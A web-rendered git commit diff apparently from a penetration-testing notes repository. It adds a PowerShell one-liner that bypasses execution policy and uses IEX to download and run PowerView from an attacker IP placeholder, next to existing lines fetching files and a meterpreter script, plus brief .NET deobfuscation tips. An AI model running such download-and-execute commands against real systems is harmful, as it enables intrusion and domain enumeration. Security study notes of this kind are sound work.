bump
This commit is contained in:
parent
495e5c972f
commit
d6c6127cb4
Binary file not shown.
|
@ -129,6 +129,11 @@ Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
|
|||
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
|
||||
```
|
||||
|
||||
* Webrequest and execute in one go
|
||||
```sh
|
||||
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
|
||||
```
|
||||
|
||||
## Base64 Decode File
|
||||
```
|
||||
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
|
||||
|
|
|
@ -0,0 +1,4 @@
|
|||
# Deobfuscation
|
||||
|
||||
* Find a deobfuscator like [de4dot](https://github.com/de4dot/de4dot.git) for e.g. deobfuscating dotfuscator
|
||||
* In case of dotnet: Do not only use ghidra for reversing, use [ILSpy](https://github.com/icsharpcode/ILSpy.git) as well
|
Loading…
Reference in New Issue